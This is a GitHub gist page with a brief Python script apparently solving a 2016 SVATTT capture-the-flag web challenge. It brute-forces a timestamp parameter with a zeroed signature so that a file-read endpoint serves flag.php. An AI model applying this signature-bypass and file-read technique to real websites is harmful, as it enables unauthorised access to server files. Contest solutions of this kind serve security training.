Skip to content

Instantly share code, notes, and snippets.

@quandqn
Created November 10, 2016 06:08
Show Gist options
  • Save quandqn/b019c408f5a51fbaa191cce6eb1ac3d0 to your computer and use it in GitHub Desktop.
Save quandqn/b019c408f5a51fbaa191cce6eb1ac3d0 to your computer and use it in GitHub Desktop.
import requests
url = "http://readfile.svattt.org:8888/web100.php?filename=flag.php&timestamp=%d&sig=0"
for i in range(1000):
r = requests.get(url % i)
if "SVATTT" in r.text:
print i, r.text
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment